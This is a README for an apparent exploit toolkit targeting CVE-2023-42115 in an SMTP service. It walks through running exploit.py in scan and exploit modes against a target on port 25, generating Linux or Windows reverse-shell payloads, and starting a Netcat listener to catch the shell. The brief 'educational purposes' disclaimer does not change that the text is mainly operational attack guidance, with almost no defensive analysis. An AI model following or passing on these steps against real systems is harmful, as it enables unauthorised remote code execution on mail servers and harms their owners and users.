This module exploits a vulnerability in the target service identified as CVE-2023-42115.
## CVE-2023-42115: Exploit and Payload Generator Scripts
This repository contains two Python scripts:
1. **`exploit.py`**: A script for exploiting CVE-2023-42115.
2. **`generate_payload.py`**: A script for generating reverse shell payloads.
## Prerequisites
Before running the scripts, ensure you have Python 3 installed on your system.
## Installation
1. **Clone the Repository**:
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
2. **Install Dependencies**:
Install the required Python libraries using pip. Run the following command to install all necessary dependencies listed in `requirements.txt`:
pip install -r requirements.txt
## Usage
This script exploits the CVE-2023-42115 vulnerability.
python exploit.py -t <target_ip> -p <target_port> [options]
**`-t`: The IP address of the target.**
**`-p`: The port of the target service.**
1. **Scan Target**
python exploit.py -t -p 25 --mode SCAN
2. **Exploit vulnerability**
python exploit.py -t -p 25 --mode EXPLOIT -f /path/to/payload.sh
This script generates a reverse shell payload based on user input.
python generate_payload.py
The script will prompt you for the following information:
**A. Payload type ( `linux` or `windows`)**
**B. Local IP: address for the reverse connection**
**C. Local Port**: for the reverse connection ** I: If you are behind a router or using NAT, make sure to set up the correct port forwarding to your device running Netcat.**
**D. Output file name** (e.g., payload.sh for `Linux` or payload.ps1 for `Windows`)
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address:
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
## Set Up a Listener
You need to set up a listener on your local machine to catch the reverse shell. You can use Netcat (nc) for this.
1. For Linux:
Open a terminal and start a Netcat listener:
nc -lvnp <YOUR_LOCAL_PORT>
2. For Windows:
Open a Command Prompt and start a Netcat listener:
nc -lvnp <YOUR_LOCAL_PORT>
**By following these steps, you should be able to create and use a payload to exploit `CVE-2023-42115` and receive a reverse shell connection.**
## Contributing
If you have suggestions for improvements or want to contribute, please open an issue or submit a pull request.
## Disclaimer
1. **Legal Disclaimer**: This script is intended for educational purposes and ethical testing. Unauthorized use against systems you do not own or have explicit permission to test is illegal and punishable by law.
2. **Ethical Use**: Use this script responsibly and only in environments where you can perform security testing.
## Troubleshooting
1. **Connection Issues**: Verify that the target is reachable and the SMTP service is running
2. **Vulnerability Detection**: Ensure that the service banner matches the expected output for the vulnerability check.
3. **Payload Execution**: Ensure that the payload file is correctly formatted and accessible.
## Contact
For questions or support, please contact
[4.0K] /data/pocs/c77ebd179911f28bf3a882f2be99106ac2b8160f
├── [2.8K] exploit.py
├── [1.8K] generate_payload.py
├── [3.4K] README.md
└── [ 33] requirements.txt
0 directories, 4 files
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